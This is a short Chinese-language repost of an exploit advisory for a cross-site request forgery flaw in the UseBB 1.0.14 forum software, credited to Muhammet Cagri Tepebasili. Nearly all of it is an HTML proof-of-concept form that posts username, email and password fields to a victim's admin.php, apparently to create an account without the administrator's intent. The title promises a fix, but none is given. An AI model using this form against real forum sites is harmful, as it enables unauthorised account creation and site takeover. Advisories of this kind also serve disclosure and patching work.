UseBB 1.0.14 CSRF缺陷及修复 - 网站安全 - 自学php

Author : Muhammet Cagri Tepebasili

开发者 : UseBB http://demo.opensourcecms.com/usebb/index.php

影响版本: 1.0.14

测试环境 : Linux Mint 11

 示例

<label><b>UseBB 1.0.14 CSRF Vulnerability | Author : Muhammet Cagri Tepebasili</b></label><br>

<label> Note : Your Password must be min 8 charecter.</label><br>

<cagritepebasili>

<form action="[Victim]/admin.php" method="post">

<table id="adminregulartable">

<tr><td class="fieldtitle">Username

<small>*</small></td><td>

<input type="text" size="30" name="name" id="name" maxlength="255" value="" /><div class="moreinfo">

</div></td></tr>

<tr><td class="fieldtitle">Email

<small>*</small></td><td><

input type="text" size="30" name="email" maxlength="255" value=""/></td></tr>

<tr><td class="fieldtitle">Password

<small>*</small></td><td><input type="password" size="30" name="passwd1" maxlength="255" /><div class="moreinfo"></div></td></tr>

<tr><td class="fieldtitle">

<small>* www.2cto.com </small></td><td><input type="password" size="30" name="passwd2" maxlength="255" /></td></tr>

<tr><td colspan="2" class="submit"><input type="submit" value="Register" /><input type="reset" value="Reset" /></td></tr></table></form>

</cagritepebasili>

 

Greetz : Eymen Sen , Cafer K.Sezer and Baris Turan

查看更多关于UseBB 1.0.14 CSRF缺陷及修复 - 网站安全 - 自学php的详细内容...